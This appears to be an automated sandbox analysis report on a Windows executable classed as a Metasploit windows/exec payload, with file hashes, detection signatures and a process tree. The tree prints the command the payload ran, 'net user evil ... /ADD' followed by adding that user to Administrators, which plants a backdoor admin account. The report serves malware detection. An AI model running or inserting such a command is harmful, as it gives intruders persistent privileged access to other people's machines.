Overview

overview

10

Static

static

10

JaffaCakes...e7.exe

windows7-x64

10

JaffaCakes...e7.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    03/01/2025, 05:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    JaffaCakes118_6a83c02c4bcf0e9f06509bf767f984e7.exe

  • Size

    72KB

  • MD5

    6a83c02c4bcf0e9f06509bf767f984e7

  • SHA1

    25a666e067c921b2bad9f72880df29debb1170d8

  • SHA256

    d1b9fc5a5e948d3039dd523ec96c4fad1c35458a10fa5a8a0bfeec03e3e6a600

  • SHA512

    0125f4a7690ff0fdc254e24d69720735f290d991920e3bd97766e70620bba54c16ebd738ee14eb7dc78e4350def3cf594680b09b37fbcf5ce2f19014b495f4f4

  • SSDEEP

    1536:Ipv4gDankxXUsdiqKGrz20xPb2cM0QNSYgPIaRMb+KR0Nc8QsJq39:qvnankxksz720xVxQhgPIAe0Nc8QsC9

Score
10/10
metasploitbackdoordiscoverytrojan

Malware Config

Extracted

Family

metasploit

Version

windows/exec

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Metasploit family
    metasploit
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Runs net.exe
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6a83c02c4bcf0e9f06509bf767f984e7.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6a83c02c4bcf0e9f06509bf767f984e7.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c net user evil ccdl2716 /ADD && net localgroup Administrators evil /ADD
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2940
      • C:\Windows\SysWOW64\net.exe
        net user evil ccdl2716 /ADD
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2744
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user evil ccdl2716 /ADD
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2456
      • C:\Windows\SysWOW64\net.exe
        net localgroup Administrators evil /ADD
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2792
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup Administrators evil /ADD
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2780

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2736-0-0x0000000000020000-0x0000000000021000-memory.dmp

    Filesize

    4KB

    Download